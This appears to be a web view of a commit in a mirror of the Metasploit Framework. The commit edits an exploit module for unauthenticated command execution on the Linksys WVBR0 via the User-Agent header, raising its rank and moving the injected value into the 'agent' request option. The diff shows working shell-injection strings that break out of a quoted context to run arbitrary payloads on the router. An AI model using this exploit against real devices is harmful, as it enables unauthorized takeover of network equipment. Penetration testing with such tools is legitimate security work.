infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Ranking upgrade and uses agent key instead of manually setting user-agent in headers

MS-2855/keylogger-mettle-extension
headlesszeke 2017-12-21 23:10:26 -06:00
parent b31ac73996
commit 3dfb836768
1 changed files with 4 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb
View File

@ -4,7 +4,7 @@
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
@ -53,9 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => '/', 'uri' => '/',
'headers' => { 'agent' => "\"; printf \"#{check_str}"
'User-Agent' => "\"; printf \"#{check_str}"
}
}) })
if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str)) if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str))
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
@ -90,9 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => '/', 'uri' => '/',
'headers' => { 'agent' => "\"; echo #{beg_boundary}; #{payload.encoded} #"
'User-Agent' => "\"; echo #{beg_boundary}; #{payload.encoded} #"
}
}) })
if res && res.code == 200 && res.body.to_s =~ /#{beg_boundary}/ if res && res.code == 200 && res.body.to_s =~ /#{beg_boundary}/
@ -113,9 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
send_request_raw({ send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => '/', 'uri' => '/',
'headers' => { 'agent' => "\"; #{payload.encoded} #"
'User-Agent' => "\"; #{payload.encoded} #"
}
}) })
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")